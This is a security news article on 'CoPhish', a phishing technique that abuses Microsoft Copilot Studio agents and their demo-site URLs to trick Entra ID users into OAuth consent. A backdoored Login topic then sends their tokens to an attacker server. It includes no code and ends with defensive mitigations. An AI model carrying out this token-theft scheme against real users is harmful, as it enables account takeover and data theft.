CoPhish Attack Exploits Microsoft Copilot Studio
A novel and sophisticated phishing stratagem, known as CoPhish, is leveraging Microsoft Copilot Studio to dupe users into unwittingly granting attackers illegitimate access to their Microsoft Entra ID accounts.
Discovered by Datadog Security Labs, this technique employs custom AI agents positioned on legitimate Microsoft domains, effectively tincturing traditional OAuth consent attacks to seem benign and thus circumventing user skepticism.
The attack, expounded upon in a recent exposé, unveils persistent vulnerabilities within cloud-centric AI tools, notwithstanding Microsoft’s ongoing endeavors to fortify consent protocols.
Exploiting the malleability of Copilot Studio, assailants can fabricate ostensibly innocuous chatbots that solicit login credentials, ultimately pilfering OAuth tokens. These tokens empower malicious undertakings, including unauthorized access to emails and calendar data.
This unsettling development arises against the backdrop of rapid advancements in AI services, where user-customizable features designed for enhanced productivity may inadvertently facilitate phishing attempts. The mounting adoption of tools like Copilot necessitates heightened vigilance for oversight of low-code platforms.
OAuth consent attacks, classified under MITRE ATT&CK technique T1528, entail ensnaring users into sanctioning misleading app registrations that request expansive permissions to sensitive data.
Within Entra ID environments, attackers fabricate app registrations aimed at accessing Microsoft Graph resources, such as email and OneNote, subsequently directing victims to consent through deceptive phishing links.
Once approved, the resulting token bestows impersonation rights upon the attacker, thereby paving the way for data exfiltration or additional breaches.
Despite Microsoft’s efforts to shore up defenses—including the imposition of restrictions on unverified applications in 2020 and an impending update in July 2025 designating “microsoft-user-default-recommended” as the standard policy, which blocks consent for high-risk permissions absent admin approval—significant vulnerabilities persist.
Unprivileged users retain the ability to consent to permissions for internal apps like Mail.ReadWrite and Calendars.ReadWrite, while administrators wielding roles such as Application Administrator can grant permissions for any application.
An anticipated policy adjustment scheduled for late October 2025 is expected to narrow these exploits, but will not entirely safeguard privileged users.
Mechanics of CoPhish: Malicious Copilot Creation
In the intricate CoPhish technique, attackers construct a malevolent Copilot Studio agent, a customizable chatbot utilizing either a trial license in their own tenant or a compromised one, as reported by Datadog.
This agent’s “Login” topic—a standardized workflow for authentication—is clandestinely backdoored with an HTTP request that exfiltrates the user’s OAuth token to an attacker-controlled server post-consent.
In addition, the demo website feature disseminates the agent via a URL resembling copilotstudio.microsoft.com, effectively mimicking legitimate Copilot services and eluding cursory domain scrutiny.
The attack commences when a victim clicks a shared link, encounters a familiar interface accompanied by a “Login” button, and is subsequently redirected to the malevolent OAuth flow.
For internal targets, the application solicits permissible scopes, such as Notes.ReadWrite, while for admin-level users, it may request an extensive array of permissions, including restricted ones.
Following consent, a validation code from token.botframework.com finalizes the process. However, the token is discreetly transmitted, often traversing Microsoft’s IP addresses, effectively obscuring it from user traffic logs.
Subsequently, attackers can exploit the token for nefarious purposes, such as dispatching phishing emails or pilfering sensitive data, all while eluding detection by the victim. A diagram illustrates this intricate flow, showcasing the agent issuing tokens post-consent for the purpose of exfiltration.
Recommended Mitigative Measures

To mitigate the risk posed by CoPhish, cybersecurity experts advocate for the implementation of custom consent policies that surpass Microsoft’s default settings, the disabling of user app creation, and the vigilant monitoring of Entra ID audit logs for any suspicious consents or modifications to Copilot.
This burgeoning incident serves as a grave reminder for the nascent landscape of AI platforms: the very traits that enhance customization also exacerbate risks when entwined with identity management systems.
As cloud services burgeon, organizations must prioritize robust and meticulous policies to fortify against such hybrid threats.
Source link: Cybersecuritynews.com.






